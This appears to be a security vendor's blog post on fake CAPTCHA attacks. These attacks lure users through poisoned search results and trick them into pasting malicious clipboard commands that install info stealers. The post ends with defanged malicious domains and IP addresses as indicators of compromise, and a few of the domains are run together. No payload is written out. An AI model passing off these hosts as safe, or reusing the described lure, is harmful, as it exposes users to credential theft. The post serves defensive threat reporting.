April 15, 2025

Defeat Fake CAPTCHA Attacks from the Source

Shuyang Wang, Damien Miller-McAndrews

Cyber attackers continuously refine their strategies to evade standard security measures. Among the newest and most misleading techniques is the fake CAPTCHA attack. This tactic deceives users by presenting what appears to be a genuine verification challenge, but instead activates harmful code and steals personal information. What distinguishes these attacks from typical phishing attempts is their entry point—they infiltrate through web search engine optimization (SEO) rather than email, allowing them to circumvent traditional phishing detection systems and email security tools.

How fake CAPTCHA unfolds

At a high level, the attack involves the following steps:

  1. A victim is lured into a compromised/malicious website
  2. A seemingly legitimate CAPTCHA is presented to the victim, who is asked to follow specific instructions in order to pass the challenge
  3. Malicious content is inserted into the victim’s clipboard. The victim then follows the instructions provided to open the “Run As” dialog, paste the contents of the clipboard, and press enter
  4. The malicious code is executed, typically reaching out to a remote location to download a malicious script. The script is executed, install malware, typically info stealers or remote access tools.

Since early this year, Obsidian has been tracking this threat's development and has identified several variations of these attacks.

New techniques

A new attack vector is emerging alongside traditional phishing emails: malicious websites ranking high in Google search results through aggressive SEO techniques. This approach is particularly effective because the entire attack sequence—from search to website interaction—occurs within the user's browser, completely circumventing standard phishing protections like Secure Email Gateways (SEGs).

When victims click on these malicious links, they typically encounter a fake CAPTCHA that appears immediately after a genuine Cloudflare Turnstile verification. This two-step approach serves dual purposes: it makes the fraudulent CAPTCHA appear more legitimate (as if the first verification failed), and it prevents security tools from examining the actual malicious content. The use of Cloudflare Turnstile as an evasion technique is becoming increasingly common, and our previous investigations have consistently found it being used in credential theft campaigns.

The downloaded malware typically belongs to well-known families of info stealers, designed to extract sensitive data—typically browser cookies and stored passwords. By harvesting and replaying web session cookies, threat actors can hijack a victim’s corporate identity. While these malware variants are well-documented by EDR vendors and won’t be the focus here, it is worth noting that Ukraine’s CERT has specifically warned about APT groups using this technique to compromise Office 365 accounts.

Stop the attack from the source

When attackers use Google search to lure users to malicious sites, the browser becomes the first—and most effective—line of defense. With the Obsidian secure browser extension, we see exactly what the user sees and can proactively block threats before they take the bait.

Even when phishing emails are protected behind Cloudflare Turnstile, browser-layer defense remains effective. Turnstile can blind traditional email security solutions, but Obsidian stays alert—catching threats where others can’t.

While EDR solutions are valuable for detecting and responding to malware, they often kick in after the device has already been compromised—when the damage is done. By detecting and blocking threats at the browser layer, we stop attacks before they reach the device, eliminating the need for costly remediation and response.

The bottom line

Fake CAPTCHA attacks represent a growing blind spot in enterprise security—exploiting user trust, and web-layer blind spots that traditional tools can't catch. Whether the attack is delivered through a phishing email or a poisoned search result, the entry point is always the same: the browser.

EDR and email security solutions have their place, but also their limitations. Real protection starts at the source—before users are tricked into executing malicious code. That’s where browser-native defenses like Obsidian shine.

To stay ahead of evolving threats:

  • Focus on preventing attacks at the browser level, not just detecting them after the fact.
  • Deploy solutions that see what users see and stop clipboard-based execution chains.
  • Educate users on deceptive tactics like fake CAPTCHAs.

In a threat landscape where social engineering is more convincing than ever, proactive browser-layer defense isn’t optional—it’s essential.

Indicators of compromise (IOCs)

x10[.]mxcoinspaceteam[.]com

payhub-secure[.]com

soubtcevent[.]com

cambodiatouristservice[.]com

fu-xu-ry[.]comomniflex-secure[.]com

securedmicrosoft365[.]com

sso-accountservices[.]com

complaintguest2[.]com

komi[.]cam

roomnum-998388[.]world

claim-pamp[.]fun

cfcaptcha[.]com

talentstack[.]icu

roomsvisitor999837[.]worldapril-boking-recapt09993748[.]com

captcha-cf[.]com

94[.]181[.]229[.]250

94[.]156[.]177[.]6

198[.]91[.]81[.]11

198[.]91[.]81[.]13

192[.]185[.]101[.]64

20[.]217[.]17[.]201

207[.]174[.]214[.]13

References

https://www.cisecurity.org/insights/blog/active-lumma-stealer-campaign-impacting-us-sltts

https://cert.gov.ua/article/6281123

Get Started

Start in minutes and secure your critical SaaS applications with continuous monitoring and data-driven insights.

get a demo